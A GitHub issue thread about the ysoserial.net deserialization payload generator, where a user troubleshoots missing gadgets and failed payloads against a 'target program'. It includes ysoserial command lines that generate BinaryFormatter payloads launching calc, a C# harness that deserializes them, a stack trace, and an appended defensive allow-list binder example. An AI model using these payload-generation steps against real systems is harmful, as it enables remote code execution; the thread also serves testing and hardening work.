pwntester / ysoserial.net

Deserialization payload generator for a variety of .NET formatters

Gadget not supported

djerryz opened this issue · comments

I see README.md apply:
RolePrincipal
DataSet
ClaimsIdentity

But when I run "ysoserial.exe -h", it does not show the above gadgets, so I need some help. Thank you.

And my target program looks like .NET 2. It uses "binaryFormatter.Deserialize(memoryStream);" and I can control memoryStream, so I think it has an RCE vulnerability.

I think you are using the old version. You can get the latest version from https://github.com/pwntester/ysoserial.net/actions

That said, if your target uses .NET v2.0, we currently have an old branch for it which still requires .NET 3.5 to be available on the box: https://github.com/pwntester/ysoserial.net/tree/v2

We are in the process of updating the release section so that will soon be available too to reduce the confusion :)

I downloaded "Release 1.32" from the release page, because I do not have the Visual Studio tools or libraries installed, so building the project may be difficult for me. But thanks for your answer; I will download the zip and try to build it, and if it succeeds I will close this issue.

"https://github.com/pwntester/ysoserial.net/suites/621551954/artifacts/4910623" is awesome.
Tried "ysoserial.exe -f BinaryFormatter -g RolePrincipal -c "cacl" -t -o base64"; the generated payload seems to have no effect on the target program.
The build of "https://github.com/pwntester/ysoserial.net/tree/v2" failed; it seems I am missing ".NETFramework,Version=v2.0". Can you build it for me? :)

ysoserial.exe -g TypeConfuseDelegate -f BinaryFormatter -c "calc.exe" -o base64 -t

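using System;
using System.IO;
using System.Text;
using System.Runtime.Serialization.Formatters.Binary;

// Test harness: decode the base64 output and pass it to BinaryFormatter.
string abc = "base64 string create by ysoserial";
MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(abc));
Console.WriteLine(Encoding.UTF8.GetString(memoryStream.ToArray()));
BinaryFormatter binaryFormatter = new BinaryFormatter();
object obj = binaryFormatter.Deserialize(memoryStream);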

(netcoreapp3.1) dotnet run, error log:

Unhandled exception. System.InvalidCastException: Object must implement IConvertible.
   at System.Convert.ChangeType(Object value, Type conversionType, IFormatProvider provider)
   at System.Runtime.Serialization.FormatterConverter.Convert(Object value, Type type)
   at System.Runtime.Serialization.SerializationInfo.GetValue(String name, Type type)
   at System.Collections.Generic.SortedSet`1.OnDeserialization(Object sender)
   at System.Collections.Generic.SortedSet`1.System.Runtime.Serialization.IDeserializationCallback.OnDeserialization(Object sender)
   at System.Runtime.Serialization.ObjectManager.RaiseDeserializationEvent()
   at System.Runtime.Serialization.Formatters.Binary.ObjectReader.Deserialize(BinaryParser serParser, Boolean fCheck)
   at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream, Boolean check)
   at System.Runtime.Serialization.Formatters.Binary.BinaryFormatter.Deserialize(Stream serializationStream) 

Reference: https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7

The same error occurs with ysoserial.exe versions Release-17 and Release 1.33.
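
For defenders, the hardened counterpart of the `binaryFormatter.Deserialize(memoryStream)` call discussed in this thread, as an added example that is not code from the thread or from ysoserial.net: a `SerializationBinder` allow-list that rejects unexpected types such as the `SortedSet` seen in the stack trace. `Settings`, `AllowListBinder` and `SafeDeserialize` are hypothetical names and .NET Framework is assumed; Microsoft's guidance is that a binder alone does not make `BinaryFormatter` safe for untrusted input, so the durable fix is a different serializer.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

// Hypothetical application type: the only object this code path expects.
[Serializable]
public sealed class Settings { public string Name; public int Retries; }

// Resolves only explicitly expected types; everything else is refused.
public sealed class AllowListBinder : SerializationBinder
{
    private static readonly Dictionary<string, Type> Allowed = new Dictionary<string, Type>
    {
        { typeof(Settings).FullName, typeof(Settings) },
    };

    public override Type BindToType(string assemblyName, string typeName)
    {
        Type t;
        if (Allowed.TryGetValue(typeName, out t)) return t;
        // Throw instead of returning null: null makes the formatter fall back
        // to its default type resolution, which defeats the allow-list.
        throw new SerializationException("Blocked type in stream: " + typeName);
    }
}

public static class Program
{
    static byte[] Serialize(object o)
    {
        using (var ms = new MemoryStream()) { new BinaryFormatter().Serialize(ms, o); return ms.ToArray(); }
    }

    static object SafeDeserialize(byte[] data)
    {
        var formatter = new BinaryFormatter { Binder = new AllowListBinder() };
        using (var ms = new MemoryStream(data)) return formatter.Deserialize(ms);
    }

    public static void Main()
    {
        // Constructed sample inputs: one expected object, one unexpected collection type.
        var ok = (Settings)SafeDeserialize(Serialize(new Settings { Name = "a", Retries = 3 }));
        Console.WriteLine("accepted: " + ok.Name);
        try { SafeDeserialize(Serialize(new SortedSet<string> { "x" })); }
        catch (SerializationException e) { Console.WriteLine(e.Message); }
    }
}
```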